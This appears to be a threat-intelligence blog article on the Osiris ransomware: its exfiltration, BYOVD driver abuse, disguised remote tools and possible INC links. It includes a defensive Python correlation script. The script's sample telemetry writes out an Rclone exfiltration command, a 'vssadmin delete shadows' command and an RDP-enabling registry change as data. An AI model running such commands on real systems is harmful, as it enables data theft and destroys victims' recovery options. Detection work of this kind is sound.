
Introduction
A newly identified ransomware strain known as Osiris has entered the cyber threat landscape, raising alarms among security researchers and enterprise defenders alike. Discovered during the investigation of a targeted November 2025 attack against a major Southeast Asian food service franchise operator, Osiris represents more than just another name in the long list of ransomware families. Its advanced capabilities, stealthy attack chain, and apparent links to established threat actors suggest a calculated evolution rather than an amateur operation. While the name Osiris echoes a ransomware variant from nearly a decade ago, researchers are clear that this is an entirely new threat, built with modern tactics and deployed by experienced hands.
The Original Findings
Security researchers from Symantec and VMware Carbon Black uncovered Osiris while analyzing a real-world intrusion that unfolded quietly over several days. The attackers began by exfiltrating sensitive data using Rclone, transferring stolen information to a Wasabi cloud storage bucket long before any encryption took place. This data theft-first approach aligns with modern double-extortion ransomware strategies, where victims are pressured not only by locked systems but also by the threat of data leaks.
Osiris itself is a fully featured ransomware payload. It can terminate services and processes, selectively encrypt files and folders, and deploy a ransom note to guide victims into negotiations. The malware supports a wide range of command-line options, allowing operators to fine-tune encryption behavior, logging, target selection, and even how virtualized environments like Hyper-V are handled. Encrypted files receive a distinctive .Osiris extension, while system-critical directories and specific file types are deliberately skipped to keep the operating system functional.
From a technical standpoint, Osiris employs a hybrid encryption scheme combining elliptic curve cryptography with AES-128 in CTR mode, generating a unique encryption key for each file. It uses asynchronous I/O managed through completion ports, an efficiency-focused design choice more often seen in mature malware families. To further damage recovery efforts, the ransomware deletes Volume Shadow Copy Service snapshots and forcibly terminates database, backup, and productivity-related processes.
The intrusion relied heavily on tool reuse. Attackers deployed a known Mimikatz variant, kaz.exe, along with dual-use utilities such as Netscan, Netexec, and MeshAgent for network discovery and lateral movement. A customized version of the RustDesk remote monitoring tool was also used, deliberately disguised with WinZip branding and icons to evade suspicion during forensic reviews.
To neutralize endpoint defenses, the attackers used a malicious driver called POORTRY, also known as Abyssworker, leveraging a bring-your-own-vulnerable-driver technique. Masquerading as a legitimate Malwarebytes component, the driver was used to disable security software at the kernel level. Additional tools like KillAV were deployed for the same purpose. Once defenses were weakened, Remote Desktop Protocol access was enabled, ensuring persistent control before the ransomware was finally executed.
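The attack chain described above (Rclone exfiltration to Wasabi days before encryption, shadow-copy deletion, a kernel driver masquerading as a security product, RDP enablement, and mass renames to the .Osiris extension) maps onto host behaviours a defender can correlate rather than signatures on any one binary. The following Python script is an added example, not code from the researchers or from the article: it runs five behavioural rules over constructed key=value telemetry (a simplified stand-in for Sysmon or EDR events; the field names, hostnames, paths, the Rclone remote name and the driver filename are all assumptions) and escalates hosts where several stages of the chain co-occur.

```python
"""Per-host correlation of the Osiris-style attack chain over constructed telemetry.

Added example: the log format is a simplified key=value line per event, not real
Sysmon/EDR output, and every hostname, path and filename below is constructed.
"""
import ntpath
import re
from collections import defaultdict

# Constructed sample telemetry (assumed field names). FS01 shows the full chain;
# WS22 shows benign look-alikes that the rules must not flag.
SAMPLE_TELEMETRY = r"""
ts=2025-11-03T01:12:44Z host=FS01 type=process image=C:\Temp\rclone.exe cmdline="rclone copy D:\Finance wasabi:corp-backup --transfers 16"
ts=2025-11-03T01:15:02Z host=FS01 type=network image=C:\Temp\rclone.exe dest=s3.wasabisys.com:443
ts=2025-11-05T22:40:10Z host=FS01 type=driver_load image=C:\Windows\Temp\mbfilter.sys signed=false
ts=2025-11-05T22:41:30Z host=FS01 type=process image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin delete shadows /all /quiet"
ts=2025-11-05T22:42:00Z host=FS01 type=registry key="HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" value=0
ts=2025-11-05T22:50:00Z host=FS01 type=file_rename target=D:\Finance\Q3.xlsx.Osiris
ts=2025-11-05T22:50:01Z host=FS01 type=file_rename target=D:\Finance\Q4.xlsx.Osiris
ts=2025-11-05T22:50:02Z host=FS01 type=file_rename target=D:\HR\roster.docx.Osiris
ts=2025-11-05T09:00:00Z host=WS22 type=process image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin list shadows"
ts=2025-11-05T09:05:00Z host=WS22 type=file_rename target=C:\Users\a\notes.txt.bak
"""

# key=value tokens; quoted values may contain spaces (command lines, registry keys).
TOKEN = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one telemetry line into a dict of string fields."""
    return {key: quoted or bare for key, quoted, bare in TOKEN.findall(line)}


def basename(path: str) -> str:
    """Lower-cased Windows file name, independent of the platform we run on."""
    return ntpath.basename(path).lower()


def classify(ev: dict):
    """Map one event to the attack stage it evidences, or None if benign."""
    kind = ev.get("type")
    image = basename(ev.get("image", ""))
    cmd = ev.get("cmdline", "").lower()
    # Stage 1: cloud exfiltration with Rclone (process or network view).
    if kind == "process" and image == "rclone.exe" and "wasabi" in cmd:
        return "cloud_exfil"
    if kind == "network" and "wasabisys.com" in ev.get("dest", "").lower():
        return "cloud_exfil"
    # Stage 2: shadow-copy deletion; "vssadmin list shadows" must not match.
    if kind == "process" and image in ("vssadmin.exe", "wmic.exe") and (
            "delete shadows" in cmd or "shadowcopy delete" in cmd):
        return "shadow_delete"
    # Stage 3: unsigned kernel driver load (BYOVD / masquerading driver).
    if kind == "driver_load" and ev.get("signed", "").lower() == "false":
        return "unsigned_driver_load"
    # Stage 4: RDP enabled by clearing fDenyTSConnections.
    if (kind == "registry" and ev.get("key", "").lower().endswith("fdenytsconnections")
            and ev.get("value") == "0"):
        return "rdp_enabled"
    # Stage 5: files renamed with the .Osiris extension.
    if kind == "file_rename" and ev.get("target", "").lower().endswith(".osiris"):
        return "osiris_rename"
    return None


def correlate(lines, rename_threshold=3):
    """Collect distinct stages per host. A single .Osiris rename is treated as
    noise; the extension counts as a stage once `rename_threshold` files are hit."""
    stages = defaultdict(set)
    renames = defaultdict(int)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = parse_event(line)
        host = ev.get("host", "?")
        tag = classify(ev)
        if tag == "osiris_rename":
            renames[host] += 1
            if renames[host] >= rename_threshold:
                stages[host].add("osiris_extension")
        elif tag:
            stages[host].add(tag)
    return {host: sorted(tags) for host, tags in stages.items()}


def hosts_with_chain(findings, min_stages=3):
    """Hosts that show at least `min_stages` distinct stages and warrant escalation."""
    return sorted(h for h, tags in findings.items() if len(tags) >= min_stages)


if __name__ == "__main__":
    found = correlate(SAMPLE_TELEMETRY.splitlines())
    for host, tags in found.items():
        print(host, ", ".join(tags))
    print("escalate:", hosts_with_chain(found))
```

The Rclone rule keys on the word "wasabi" in the command line only because the constructed remote is named that way; in real configs the remote name is arbitrary, so the network rule on the Wasabi endpoint (or on any bulk upload to an unsanctioned storage provider) is the one to rely on. The value of the script is the per-host correlation: any single stage has benign explanations, but exfiltration followed by shadow-copy deletion, an unsigned driver load and RDP enablement on the same host is the sequence the article describes, and it is visible days before the first file is renamed.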
Although little is known about Osiris’s developers or whether it operates under a ransomware-as-a-service model, researchers identified tactical overlaps with the INC (also known as Warble) ransomware group. These similarities point either to imitation or to the involvement of a former INC affiliate. Despite these clues, definitive attribution remains elusive.
What Undercode Says:
Osiris is not dangerous because it is new; it is dangerous because it is familiar in all the wrong ways. The attack chain reads like a greatest-hits compilation of modern ransomware operations, refined rather than reinvented. Data exfiltration days before encryption, heavy reliance on dual-use tools, kernel-level defense evasion, and carefully engineered encryption logic all point to operators who understand both enterprise environments and incident response playbooks.
The use of BYOVD via the POORTRY driver is especially telling. This technique has become a hallmark of skilled ransomware crews who know that bypassing endpoint protection is often more effective than attempting to evade it at user level. Kernel drivers grant power, and power shortens dwell time. Once defenses are blind, everything else becomes easier.
Another red flag is the customization of legitimate remote management software. Disguising RustDesk as “WinZip Remote Desktop” is not just a cosmetic trick; it reflects an understanding of how defenders triage alerts and review binaries under pressure. Blending in is often more valuable than exploiting zero-days, and the Osiris operators appear to know that well.
The possible link to INC ransomware actors matters, even if attribution is not confirmed. INC has historically favored disciplined operations over noisy mass campaigns. If Osiris is indeed connected to former INC affiliates, it suggests a splintering trend where experienced actors spin up new brands to escape law enforcement heat or reputational baggage while retaining proven tooling and tactics.
Equally important is what remains unknown. There is no clear evidence yet of a public ransomware-as-a-service offering, no known leak site, and no chatter suggesting large-scale distribution. This points to either a private ransomware framework or a group still in its early operational phase. Both scenarios carry risk. Private frameworks often target fewer victims but hit them harder, while early-stage families tend to evolve rapidly once initial attacks succeed.
Osiris should be read as a signal, not an outlier. It reflects a ransomware ecosystem where innovation happens quietly, attribution grows murkier, and recycled tools are sharpened rather than discarded. Defenders who rely solely on signature-based detection or assume new names mean new capabilities will continue to be caught off guard.
Fact Checker Results
✅ Osiris is a newly identified ransomware strain unrelated to the 2016 Locky-based variant.
✅ The attack used BYOVD techniques and data exfiltration prior to encryption.
❌ Direct attribution to the INC ransomware group has not been conclusively proven.
Prediction
📊 Osiris is likely to evolve into a more visible threat if its initial operations remain successful.
📊 Future campaigns may reveal a dedicated leak site or a formal ransomware-as-a-service model.
📊 Increased reuse of BYOVD and disguised remote tools will push defenders toward stronger driver-level and behavior-based protections.
References:
Reported By: securityaffairs.com